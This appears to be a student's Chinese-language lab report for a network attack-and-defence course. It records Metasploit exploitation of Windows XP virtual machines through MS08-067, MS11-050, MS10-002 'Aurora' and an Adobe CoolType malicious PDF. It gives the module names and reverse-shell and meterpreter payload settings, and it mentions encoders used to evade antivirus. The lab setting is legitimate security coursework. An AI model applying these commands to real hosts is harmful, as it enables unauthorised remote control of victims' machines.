1. 程式人生 > >20155330 《網絡對抗》 Exp5 MSF基礎應用

20155330 《網絡對抗》 Exp5 MSF基礎應用

ref 及其 smb tel 相關 windows服務 實踐 IE coo

20155330 《網絡對抗》 Exp5 MSF基礎應用

實踐過程記錄

Windows服務滲透:MS08_067漏洞攻擊

  • 攻擊機:kali
    • IP地址:192.168.124.132
  • 靶機:windows XP SP3 簡體中文
    • IP地址:192.168.124.135
  • 輸入命令use exploit/windows/smb/ms08_067_netapi
  • 設置參數

    set payload generic/shell_reverse_tcptcp反向回連
    set LHOST 192.168.23.130 此IP是kali的IP
    set LPORT 5321 端口
    set RHOST 192.168.23.142 此IP是靶機WIN XP的IP,特定漏洞端口已經固定
    set target 0
  • 並進行攻擊exploit
    技術分享圖片
  • 結果失敗了。
    技術分享圖片
  • 然後重新換了一臺靶機windows XP SP3(English),重設了攻擊目標地址。
    技術分享圖片
  • 成功了,使用systeminfo查看靶機信息。
    技術分享圖片

    瀏覽器:MS11-050漏洞攻擊

  • 攻擊機:kali
    • IP地址:192.168.124.132
  • 靶機:Windows XP Professional SP3 簡體中文
    • IP地址:192.168.124.135
  • use windows/browser/ms11_050_mshtml_cobjectelement使用該模塊
  • 加載payloadset payload windows/meterpreter/reverese_http
    ,並設置相應參數,打開服務exploit,發起滲透攻擊。
    技術分享圖片
  • 在靶機中啟動IE 7瀏覽器,訪問鏈接:http://192.168.124.132:8080/ms5330
    技術分享圖片
  • 但是在kali攻擊機中一直出錯,回連沒有成功。
  • 然後參考組長的博客,將攻擊的目標漏洞換成了MS10_002_aurora

    瀏覽器:MS10_002_aurora漏洞攻擊

  • 攻擊機:kali
    • IP地址:192.168.124.129
  • 靶機:Windows XP Professional SP3(English)
    • IP地址:192.168.124.136
  • 輸入下圖中的命令並執行攻擊
    技術分享圖片
  • 在靶機中啟動IE 7瀏覽器,訪問鏈接:http://192.168.124.132:8080/aurora.html

    技術分享圖片
  • 本來是回連成功的,但是輸入錯了命令,然後只好重做了一遍。
    技術分享圖片
  • 第二次生成了不同的網址
    技術分享圖片
  • 回連成功後使用sysinfo查看靶機信息
    技術分享圖片
  • 靶機ip地址
    技術分享圖片

    Adobe滲透測試

  • 攻擊機:kali
    • IP地址:192.168.124.129
  • 靶機:Windows XP Professional SP3 簡體中文
    • IP地址:192.168.124.135
  • 進入windows/fileformat/adobe_cooltype_sing模塊設定相關系數並生成相關文件5330.pdf
    技術分享圖片
  • 將生成的pdf文件導入到靶機中運行,回連成功!可對靶機進行操作。
    技術分享圖片
  • 在靶機中關閉PDF文檔後,攻擊機與靶機斷開連接。
    技術分享圖片

    輔助模塊

  • 輸入命令show auxiliary查看所有輔助模塊
    技術分享圖片
  • 選中其中一個模塊進入
    技術分享圖片
  • show options查看需要設置的消息,並設置必要參數
    技術分享圖片
  • 使用命令run開啟掃描,結果如下:
    技術分享圖片

實驗後回答問題

  • exploit
    • 攻擊。簡單來說就是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊。主要分為主動攻擊和被動攻擊。
  • payload
    • 攻擊載荷。類似shellcode,在攻擊滲透成功後對被感染計算機進行後門操作,達到攻擊效果。
  • encode
    • 編碼器。修改字符達到“免殺”目的。

實驗感受

這次實驗主要對Windows xp系統及其有關應用中的部分漏洞進行了攻擊,從而也感受到了msf工具功能的強大。

20155330 《網絡對抗》 Exp5 MSF基礎應用